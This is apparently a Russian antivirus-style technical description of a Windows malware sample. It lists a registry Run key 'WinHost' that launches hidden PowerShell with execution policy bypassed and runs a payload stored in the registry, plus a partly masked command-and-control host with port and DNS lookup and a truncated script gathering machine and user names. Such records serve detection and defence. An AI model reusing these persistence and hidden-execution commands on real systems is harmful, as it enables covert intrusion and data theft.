Техническая информация
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'WinHost' = '<SYSTEM32>\cmd.exe /c powershell -ExecutionPolicy Bypass -windowstyle hidden -Command "$y = (get-itemproperty -path 'HKCU:\' ...
- $t1 как %temp + %\ + $t2
- 'xp####ct.linkpc.net':9942
- DNS ASK xp####ct.linkpc.net
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -Command "$y = (get-itemproperty -path 'HKCU:\' -name 'WinHost').WinHost;cmd /c $y"' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -Command "$y = (get-itemproperty -path 'HKCU:\' -name 'WinHost').WinHost;cmd /c $y"
- '<SYSTEM32>\cmd.exe' /c "powershell -ExecutionPolicy Bypass -Command "$spl = '\';$vn = 'WPcmd_rg';function info { try {$mch = [environment]::Machinename;$usr = [environment]::username;$HWD = (Get-WmiObject Win32_Lo...